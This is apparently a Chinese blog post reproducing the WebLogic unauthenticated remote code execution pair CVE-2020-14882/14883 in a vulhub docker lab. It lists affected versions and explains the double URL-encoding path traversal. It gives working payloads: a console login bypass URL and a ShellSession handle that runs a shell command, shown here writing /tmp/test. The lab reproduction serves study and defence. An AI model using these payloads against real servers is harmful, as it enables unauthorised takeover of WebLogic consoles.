经典weblogic未授权命令执行漏洞复现

2023年2月2日21:52:58评论110 views字数 1630阅读5分26秒阅读模式

漏洞介绍

远程代码执行漏洞（CVE-2020-14882）POC 已被公开，未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求，结合 CVE-2020-14883 漏洞进行利用，利用此漏洞可在未经身份验证的情况下直接接管WebLogic Server Console ，并执行任意代码，利用门槛低，危害巨大。

版本影响

OracleWebLogicServer

版本：10.3.6.0，12.1.3.0，12.2.1.3，12.2.1.4，14.1.1.0。

环境搭建

1，使用docker搭建环境

git clone  https://github.com/vulhub/vulhub.gitcd weblogic/CVE-2020-14882docker-compose up -d

docker ps   //查看镜像信息

访问页面：

漏洞成因

后台界面实际上访问的是/console/console.portal，然后我们查看weblogic后台对应的webapp的web.xml（后台本身也算是一个webapp）

调用链：AsyncInitServlet#server-->MBeanUtilsInitSingleFileServlet.#server-->SingleFileServlet#server-->UIServlet#server分析详情参考：https://www.anquanke.com/post/id/221752

攻击步骤

通过访问console.portal文件绕过登录直接进入后台

payload:http://yourip:7001/console/images/%252E%252E%252Fconsole.portalpayload解析：URLDecoder.decode执行完成后，我们的url路径(images/%2e%2e%2f)被再次解码，最终变成images/…/console.portal.portal，导致目录穿越。根据http规定，url部分，需要url编码后发送给服务器。服务器正常解开并继续处理。这是第一层url编码。URLDecoder.decode()对URL进行了二次编码从而绕过限制。servlet中先处理二次编码的poc，然后再有鉴权代码去鉴权，欺骗服务器后，服务器发现有权限访问静态资源(/console/images/%252E%252E%252Fconsole.portal ，其实有…/)，然后就让我console.portal，从而接管后台。

成功的绕过登录进入后台

进入后台后进行命令执行

方法1：

payload:?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/test%27);%22);进行文件写入